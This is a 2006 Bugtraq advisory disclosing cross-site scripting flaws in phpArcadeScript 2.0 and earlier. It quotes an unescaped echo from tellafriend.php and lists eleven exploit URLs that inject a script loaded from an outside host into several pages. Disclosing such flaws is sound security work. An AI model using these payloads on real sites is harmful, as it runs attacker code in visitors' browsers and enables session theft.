phpArcadeScript XSS Injections

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: phpArcadeScript XSS Injections
From: retard@xxxxxxxxxx
Date: 4 Mar 2006 06:23:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

???summary
        software: phpArcadeScript
        vendors website: http://www.phparcadescript.com/
        versions: <= 2.0
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: retard and jim
        risk level: medium

??? description
        due to phpArcadeScript excessive use of global variables attackers
        can very easily inject xss into various portions of the application

        in ./includes/tellafriend.php:

21      22 if ($about == "game")
23      {
24      echo $gamename;
25      }
26      
27       else
28       {
29       echo $site_title;
30       }
31       ?>

        this poor coding is repetative throughought the application, possibly
        having more vulnerabilities present in the coding.

??? exploit(s)

        
http://example.com/includes/tellafriend.php?about=game&gamename=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/admin/loginbox.php?loginstatus=1&login_status=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/index.php?action=tradelinks&submissionstatus=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/includes/browse.php?cell_title_background_color=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/includes/browse.php?browse_cat_id=1&browse_cat_name=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/includes/displaygame.php?filetype=1&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/includes/displaygame.php?filetype=2&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/includes/displaygame.php?filetype=3&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/includes/displaygame.php?filetype=4&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/includes/displaygame.php?filetype=5&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
http://example.com/includes/displaygame.php?filetype=6&gamefile=%22%3E%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E
        
??? credit
        author(s): retard and jim
        email: retard@xxxxxxxxxx

Prev by Date: [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in included XPdf code
Next by Date: Various router DoS
Previous by thread: [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in included XPdf code
Next by thread: Various router DoS
Index(es):
- Date
- Thread